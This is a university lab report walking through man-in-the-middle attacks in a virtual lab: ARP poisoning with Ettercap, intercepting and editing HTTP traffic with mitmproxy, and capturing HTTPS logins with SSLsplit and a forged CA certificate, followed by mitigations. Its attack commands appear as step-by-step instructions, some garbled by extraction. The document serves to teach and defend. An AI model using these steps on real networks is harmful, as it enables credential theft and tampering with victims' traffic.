You are on page 1of 33

University of Trento

MAN IN THE MIDDLE


ATTACK

Author:
Muvhunzwi Peacemaker Supervisor:
Addis Abebe Feyso Bruno crispo
Samuel Birhanu

May 15, 2017


Contents
1 Introduction 2

2 Environment Setup 3
2.1 Ettercap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.1.1 Installation of Ettercap graphical . . . . . . . . . . . . 6
2.2 MitmProxy . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2.2.1 Intallation of Mitmproxy . . . . . . . . . . . . . . . . . 7
2.3 SSLSPLIT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.3.1 Installation of sslsplit . . . . . . . . . . . . . . . . . . . 8
2.4 Apache web server . . . . . . . . . . . . . . . . . . . . . . . . 8
2.4.1 Installation of Mysql . . . . . . . . . . . . . . . . . . . 8
2.5 Websites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10

3 Protocol detail 12
3.1 Http Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
3.2 Https Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . 12

4 Attack-1 14
4.1 Address Resolution Protocol (ARP) . . . . . . . . . . . . . . . 15

5 Attack-2 25
5.1 Transport Layer Security . . . . . . . . . . . . . . . . . . . . . 25
5.2 Security Socket Layer . . . . . . . . . . . . . . . . . . . . . . . 25

6 References 31

1
1 Introduction
One of the most common network attacks used against individuals and large
organizations is man-in-the-middle (MITM) attack. It works by establishing
connections to user machines and relaying messages between them. The user
believes it is communicating directly with another user or server, when in
reality the communication flows through the attacker machine performing
the attack. The end result is that the attacker can not only intercept sensi-
tive data, but can also inject and manipulate a data stream to gain further
control of its user. The purpose of this Lab is to introduce you to the concept
of Man in the middle attack, the tools used for this kind of attack and to
give you the general idea of performing this attack in real life scenarios. In
the end of this Lab we will give you the idea of the Mitigation techniques
that can be used to prevent this kind of attack. There are different forms
of MITM attacks like ARP poisoning, eavesdropping, WIFI WEP/ WPA/2
Hacking, DNS spoofing, and Port stealing.

In this Lab, we will be implementing most of the widely used forms of


MITM attacks which are ARP Poisoning, eavesdropping for Http and Https
protocols.

2
2 Environment Setup
In this lab, will be having a Lab structure in which you will inserting yourself
in the middle of a connection between a client and a server to perform a
Man-in-the-Middle (MitM) attack. The attack will be done in a virtual
environment Using VirtualBox software. Three Virtual machines will be
used for this Lab in which one of them will be the server, the other will be
the client while the third machine will be the attacker. In detail we will have:
A Server running Ubuntu 16.04 LTS with an IP address of 192.168.0.1
and Mac address of 08:00:27:9c:07:2b

A client running Ubuntu 16.04 LTS with an IP address of 192.168.0.2 and


Mac address of 08:00:27:6c:d6:77

3
An attacker running Ubuntu 16.04 LTS with an IP address of 192.168.0.3
and Mac address of 08:00:27:7d:ac:89

4
2.1 Ettercap
Ettercap provides many features for network and host analysis. It offers four
modes of operation which are

IP-based: packets are filtered based on IP source and destination

MAC-based: packets are filtered based on MAC address, useful for


sniffing connections through a gateway

ARP-based: uses ARP poisoning to sniff on a switched LAN between


two hosts (full-duplex)

Public ARP-based: uses ARP poisoning to sniff on a switched LAN


from a victim host to all other hosts (half-duplex).

5
2.1.1 Installation of Ettercap graphical
To install Ettercap-graphical on the attacker virtual machine:
Step 1: Update system
$ sudo apt-get update
Step 2: Install: ettercap-graphical
$ sudo apt-get install ettercap-

2.2 MitmProxy
Mitmproxy is an open source proxy application that allows intercepting
HTTP connections between any HTTP client and a web server using a typ-
ical mitm attack. it accepts connections from clients and forwards them to
the destination server. The goal of mitmproxy is to let an attacker monitor,
capture and alter these connections in real time.
For plain text HTTP connections, mitmproxy accepts a connection from
the HTTP client, displays the request to the attacker on the screen, and
forwards the request to the destination web server as soon as the attacker
confirms or maybe after adjusting the request. mitmproxy simply acts as a
middle man: To the client, it looks like as if the mitmproxy server was simply
relaying its connection. And to the server, it looks like the mitmproxy server
is the client.

6
2.2.1 Intallation of Mitmproxy
The first step to install mitmproxy on the attacker virtual machine is to
install pip3, python3-dev and several libraries using the following command.
$ sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
The second step is to install the mitmproxy using the command below
$ sudo pip3 install mitmproxy

2.3 SSLSPLIT
SSLsplit is a tool for man-in-the-middle attacks against encrypted HTTPS
connections. Connections are transparently intercepted through a network
address translation engine and redirected to SSLsplit. SSLsplit terminates
SSL/TLS and initiates a new SSL/TLS connection to the original destination
address, while storing all the data transmitted in log files. SSLsplit acts as
a middle man between the client and the actual server if traffic is being
redirected to the server on which SSLsplit is running by changing the default
gateway or ARP spoofing. It picks up SSL connections and pretends to be
the server the client is connecting to. To do so, it dynamically generates a
certificate and signs it with the private key of a CA certificate that the client
must trust.

7
2.3.1 Installation of sslsplit
First step to install sslsplit on the attacker virtual machine is to download
the SSLsplit zip file and extract it as follows:
$ wget http://mirror.roe.ch/rel/sslsplit/sslsplit-0.4.7.tar.bz2
$ bunzip2 sslsplit-0.4.7.tar.bz2
$ tar xvf sslsplit-0.4.7.tar
Then install the following packages and compile the source code:
$ apt-get install libssl-dev libevent-dev $ cd sslsplit-0.4.7 $ make

2.4 Apache web server


Apache is a Web server software which enables a computer to host one or
more websites that can be accessed over the Internet using a Web browser. It
runs in the background under an appropriate operating system, which sup-
ports multi-tasking, and provides services to other applications that connect
to it, such as client web browsers.

2.4.1 Installation of Mysql


To install Apache, we first install the package apache2. This can be done by
running the following command

8
$sudo apt-get install apache2
To install MySQL, we install the package mysql-server by running the
following command
$ sudo apt-get install mysql-server
To install PHP, we install packages php5 and libapache2-mod-php5 as
follows
$ sudo apt-get install php5 libapache2-mod-php5

9
2.5 Websites
To be able to demonstrate the mitm attack, we managed to create shopping
website where the client has to login and fill in some details to complete an
order. These are the information that the attacker will manipulate.
We hosted an HTTP and an HTTPS protocol website on the server virtual
machine. The HTTP protocol website is http://shop.com while https://ssl.shop.com
is the HTTPS protocol website
We generated a self-signed X509 certificate for the domain https://ssl.shop.com.
We move the .crt file into the folder /etc/ssl/certs and the .key file into the
folder /etc/ssl/private. We also added the IP address and domain names
of the websites into the hosts file (/etc/hosts) of the client and attacker
virtual machines. So these domains will be resolved locally. The con-
figuration files for the two websites mentioned above were copied to the
/etc/apache2/sites-enabled directory. In the end the web application was
setup in the //var/www//shop.com//publich tml and
//var/wwwssl.shop.com//publich tmlf olders.
To set up a MySQL database for the websites, we installed phpmyadmin
on the server virtual machine. Phpmyadmin is a MySQL database manage-
ment software available for windows and Linux based machines.To login to
phpmyadmin use username root and password 123456.

10
11
3 Protocol detail
3.1 Http Protocol
The Hypertext Transfer Protocol (HTTP) is an application-level protocol of
the TCP/IP protocol suite. It is a communication protocol, that is used
to deliver data on the World Wide Web. The default port is TCP 80, but
other ports can be used as well. HTTP is stateless protocol since the server
and client are aware of each other only during a current request. It is a
request/response protocol based on the client/server based model. The Http
client sends a request to the server in the form of a request method, URI, and
protocol version while the server responds with a status line, including the
messages protocol version and a success or error code. Http and https have
some request methods which include the GET and POST request methods.
The GET method is used to request a representation of specified results and
it should only retrieve data that exist already on the server or return an
error. The POST method is used to request that the server accept the data
enclosed in the body of the request and probably store it as a new resource.
The major drawback of Http is that all communications are in plain text
and can be read by a man in the middle that manages to break into the
connection between client and the server. For a secure web communication,
we need to use Https protocol

3.2 Https Protocol


Hyper Text Transfer Protocol Secure (HTTPS) is the secure version of HTTP,
the protocol over which data is sent between a client and a server that you are
connected to. It means all communications are encrypted. It is often used to
protect highly confidential online transactions like online banking and online
shopping order forms. HTTPS typically uses one of two secure protocols to
encrypt communications - SSL (Secure Sockets Layer) or TLS (Transport
Layer Security). Both the TLS and SSL protocols use what is known as an
asymmetric Public Key Infrastructure (PKI) system. In asymmetric system
two keys are used to encrypt communications, a public key and a private
key. Data encrypted with the public key can only be decrypted by the private
key and inversely.
What is Https Certificate?
Https certificates are necessary for every https communication. When a

12
client requests an HTTPS connection to a server, the server will send its SSL
certificate to the client. This certificate contains the public key needed to
begin the secure session. The client and the server then initiate the SSL
handshake. The SSL handshake involves the generation of shared secrets
to establish a uniquely secure connection between the client and the server.
When a trusted SSL Digital Certificate is used during a HTTPS connection,
clients will see a padlock icon in the browser address bar.

13
4 Attack-1
On this attack we will demonstrate an attack on the http protocol using
Ettercap, Mitmproxy and the website http://shop.com .We will also be in-
troducing you the idea of Arp poisoning which is one of the basics of this
attack.
Step 1 After verifying that the machines are connected check the arp
tables of the virtual machines.

Before the attack the two machines connected to each virtual machine on
the interface enp0s3 have a different IP and Mac addresses
Step 2: Start ettercap using the command below on the Attacker virtual
machine
$sudo ettercap -G

14
4.1 Address Resolution Protocol (ARP)
ARP allows systems to associate an IP address to a MAC address. Systems
keep an ARP look-up table where they store information about what IP
addresses are associated with what MAC addresses. When trying to send a
packet to an IP address, the system will first consult this table to see if it
already knows the MAC address. The ARP tables are formed by using either
ARP request-reply mechanism or Gratuitous ARP mechanism. In the ARP
request -reply mechanism the sender broadcasts request with the IP address
of the receiver on the network and the receiver replies with its MAC address.
For the Gratuitous ARP mechanism, a machine broadcast is its IP and MAC
address on the network.
What is ARP poisoning?
ARP replies or Gratuitous ARP do not require an additional conforma-
tion. Thus, the attacker can send a falsified ARP broadcast over the network.
This results in the linking of attackers MAC address to the IP address of
another user on the network
Step 3: To perform the ARP poisoning using ettercap

On the ettercap window go to Sniff on the upper menu bar

Select Unified sniffing

Confirm the network interface enp0s3 which is the network interface of


the VM by clicking ok

15
After pressing Ok on the window you see go to Hosts on the upper
menu bar

Select Scan for Hosts

Click for the Hosts option on the upper menu bar again

Select Hosts List

Then you should be able to see the ip address of the client and the
server along with their MAC addresses

Click on the server ip address (192.168.0.1) and click add to Target 1

Click on the server ip address (192.168.0.2) and click add to Target 2

16
On the Ettercap window go to Mitm on the upper menu bar

Select ARP Poisoning for each host

Check on Sniff Remote Connections option on the optional parameters

Click Ok

Repeat this for each target

17
step 4
Check the ARP tables of the client and the server virtual machine by
typing arp -a

After ARP poisoning attack, we can see that the two machines connected
to the victims have the same MAC address so our attack was a success

18
Are there ways to mitigate ARP poisoning?
One of the solution to prevent ARP cache from being poisoned there by
protect against ARP Spoofing, is to add static IP-MAC entries to the cache.
If an ARP cache has been made static it will not process any ARP Replies
received unlike a dynamic ARP cache.
We can set the static-MAC entry to the cache of the client machine using
the following command
$ sudo arp -s 192.168.0.1 08:00:27:9c:07

ARP poisoning will not work after using a static arp entry. Another so-
lution, is to use Intrusion Detection Systems (IDS) to detect ARP Poisoning
attacks
Step 5 Redirecting the traffic
By default mitmproxy listens on TCP port 8080. To allow for interception
we will redirect all incoming HTTP traffic to the port 8080 where mitmproxy
listens and HTTPS traffic to port 8443 where sslsplit listens on.
To activate IP forwarding use the command below
$ sudosysctlwnet.ipv4.ipf orward = 1
We remove any other previous entries to prevent conflicting enteries using
the following command
$sudo iptables t nat -F
Next we redirect all incoming Http traffic to port 8080
$sudo iptables t nat A PREROUTING -i enp0s3 p tcp dport 80 j
REDIRECT to-port 8080
Finally we redirect all incoming Https traffic to port 8443
$sudo iptables t nat A PREROUTING -i enp0s3 p tcp dport 443 j
REDIRECT to-port 8443

step 6 Start Mitmproxy


On the Attacker virtual machine start mitmproxy by typing the following
command.
$ sudo mitmproxy -T host

19
step 7 On the client machine open the web browser and access the website
http://shop.com On the login page enter the user name and password given
as

Username: user

Password: 123456

step 8 Sniffing the conversation


Go to the attacker virtual machine to see the whole conversation between
the client and the server on mitmproxy

20
On the image above we can see the information exchange between the
client and the server. The attacker can get all the sensitive data of the com-
munication and all the details of the conversation between the client and
server such as the port number, protocol version and connection establish-
ment procedures
step 9 Modifying the conversation

Mitmproxy allows you to intercept the traffic and modify the information

To intercept the traffic on mitmproxy type i

You will need to use .* as intercept filter and press Enter key. This
allows you to intercept all requests and responses.

Go back to the client VM and visit http://shop.com

On the attacker VM, the intercepted requests will appear in orange on


the mitmproxy as shown below

21
To forward these requests to the server and the responses to the client,
click on them and press a

Enter in the client browser your information to allow confirm the pur-
chase and the delivery.

To edit the sensitive information from the attacker

Click on e and the then q to edit this query

22
Use the arrow keys to navigate to the values you want to edit

Then press enter and modify the value

After modifying press esc key and move down to the next value using
arrow keys

Once you finish editing press q to go back and accept the request
and the response

23
To check if the changes were successful check the client web browser

As shown on the client browser the mitmproxy managed to modify the


information. However, in a real-life scenario the attacker may need to modify
the response so the client wont be aware of the changes made. This con-
cludes our first attack on the http protocol and it was a success

What are the possible countermeasures to this kind of attack?

This attack possible due to the lack of security in the Http protocol and
lack of authentication between the server and the client. Thus, it is recom-
mended to use Https protocol which is a secured version of Http. There are
3 effective ways to defend against a man-in-the-middle attack even without
SSL. These methods encrypt the data traffic between you and the server you
are connecting to, and also include some kind of end-point authentication.
The first method is using Virtual Private Network (VPN) which is a secure
connection that extends a private network across a public network results in
benefiting from the functionality, security and management policies of the
private network. The second method is utilizing Proxy Server with Data En-
cryption which lets you encrypt the transmission between you and the proxy.
The last method is the use of Secure Shell(SSH), which is a network protocol
for remote administration of UNIX/LINUX hosts. SSH is typically used to
log into a remote machine and execute commands, but it also supports tun-
nelling, forwarding TCP ports and X11 connections. A Secure Shell (SSH)
tunnel consists of an encrypted tunnel created through an SSH protocol con-
nection. Users may set up SSH tunnels to transfer unencrypted traffic over
a network through an encrypted channel.

24
5 Attack-2
We will be demonstrating an attack on Https protocol by using Ettercap
and sslsplit .This attack will be implemented on https://ssl.shop.com which
is Https based shopping website. In order to change Http to Https we can use
either TLS or SSL to encrypt the information that is transmitted between
the client and the server.

5.1 Transport Layer Security


Transport Layer Security (TLS) is a protocol that provides privacy and data
integrity between two communicating applications. Its the most widely de-
ployed security protocol used today, and is used for Web browsers and other
applications that require data to be securely exchanged over a network, such
as file transfers, VPN connections, instant messaging and voice over IP . TLS
connection is secure because symmetric cryptography is used to encrypt the
data transmitted. The keys for this symmetric encryption are generated
uniquely for each connection and are based on a shared secret negotiated at
the start of the session. The server and client negotiate the details of which
encryption algorithm and cryptographic keys to use before the first byte of
data is encrypted

5.2 Security Socket Layer


SSL is a security protocol that is used to set up for encryption and also for the
authentication. SSL uses certificates that utilize public key and private key as
a way to perform authentication. In this Lab we will use Https (http over SSL
protocol) as an example of SSL implementations. By using SSL certificate,
web users are convinced that they are communicating with the right web
server, not an attacker that pretends to be the server. A valid certificate is
signed by a trusted Certificate Authority (CA) which is recognized by the
browser. If an attacker tries to make his own certificate, browser will warn
the user that the certificate is not trustworthy and the user would better
cancel the website visit due to a man-in-the-middle attack possibility

25
How to create and install a CA certificate

For SSLsplit to act as a middle man for SSL connections, it needs to be


able to generate and sign certificates that the victim trusts. In order to do
so, on the client machine we should move the attackers root CA certificate
in to the SSL directory. We used openssl to create a self-signed certificate
using the following commands
$ sudo openssl genrsa -out ca.key 2048
$ sudo openssl req -new -x509 -days 365 -key ca.key -out ca.crt
The first command generates a private RSA key of size 2048 bits. While
the second command generates X509 certificate which is valid for 365 days.
We can implement the attack on Https based on the following

Step 1 create directory for connection files

$ sudo mkdir /tmp/sslsplit

$ sudo mkdir /tmp/sslsplit/logdir

Step 2 Start sslsplit on the attacker virtual machine

$ cd sslsplit-0.4.7

$ sudo ./sslsplit D l connections.log j /tmp/sslsplit S logdir k ca.key


c ca.crt ssl 0.0.0.0 8443

26
Step-3 Access the secure website https://ssl.shop.com on the client ma-
chine

As shown on the image above, the browser is giving a warning since the
connection is using a self signed certificate and not trusted by the browser.
To ignore this warning, Click on advanced > add exception > confirm
security exception

27
To be able to see the certificate created on the client web browser click
on the Key icon >click on the right arrow pointing to the right > select
more information >click on view certificate.

28
Step 3 View the captured traffic on sslsplit
After completing the login details on the website Sslsplit saves the log files
f0r each request and response in the /tmp/sslspit/logir we created

To analyse this further use the following commands

$ cd /tmp/sslsplit/logdir

$ ls

29
To view the contents of the file

First type $sudo cat

Then press the tab key and a number will appear and the press the
tab key twice. Enter the next 2 or 3 digits which are unique for the file
you want to see and the press the tab key for auto completion and click
on enter key.

As shown on the image, sslsplit managed to convert the encrypted data


on Https to plain text Http and managed to capture the username and the
password used by the client

Sslsplit also managed to capture sensitive information sent by the client.


This information can be modified using the mitm tools such as mitmproxy
as seen in Attack-1. The encryption is broken and the client is forced to
communicate using Http.

30
How to prevent such kind of attack

Since this attack is also based on Arp poisoning all the mitigation mea-
sures suggested before can be used. The availability of OpenSSL as open
source allows to attackers to create self-signed certificates easily. Thus, users
should take warnings given by the browser in to account and not continue to
visit the website since the connection might be passing through a man in the
middle. In addition, users should check the URL link they are visiting, if it is
secured by a trusted SSL CA then it shows a green padlock or a green URL in
some browsers. We can use HTTP Strict Transport Security (HSTS) which
mitigates attacks on servers by enabling web sites to declare themselves ac-
cessible only via HTTPS. Public Key Pinning Extension for HTTP that can
be implemented and mitigates attacks on servers by enabling web sites to
declare fingerprints of allowed server and CA certificate
when transferring sensitive information,user should avoid using public WIFI
hotspots since since some of them will act as man in the middle and steal or
modify information they are routing between them and the Internet.

6 References
1. https://www.concise-courses.com/man-in-the-middle-attack/

2. https://www.devmanuals.net/install/ubuntu/ubuntu-16-04-LTS-Xenial-
Xerus/how-to-install-ettercap-graphical.html

3. https://www.darknet.org.uk/2016/12/ettercap-man-in-the-middle-attack-
suite/

4. http://docs.mitmproxy.org/en/stable/install.html

5. https://blog.heckel.xyz/2013/07/01/how-to-use-mitmproxy-to-read-and-
modify-https-traffic-of-your-phone/

6. https://blog.heckel.xyz/2013/08/04/use-sslsplit-to-transparently-sniff-tls-
ssl-connections/

7. http://howtoubuntu.org/how-to-install-lamp-on-ubuntu gq0wodUVE

8. https://code.tutsplus.com/tutorials/an-introduction-to-apachenet-25786

31
9. https://www.instantssl.com/https-tutorials/what-is-https.html

10. https://www.instantssl.com/ssl-certificate-products/https.html

11. http://desadware.com/articles/security/3-effective-ways-defend-man-middle-
attack-mitm/

12. https://tools.ietf.org/html/rfc826

32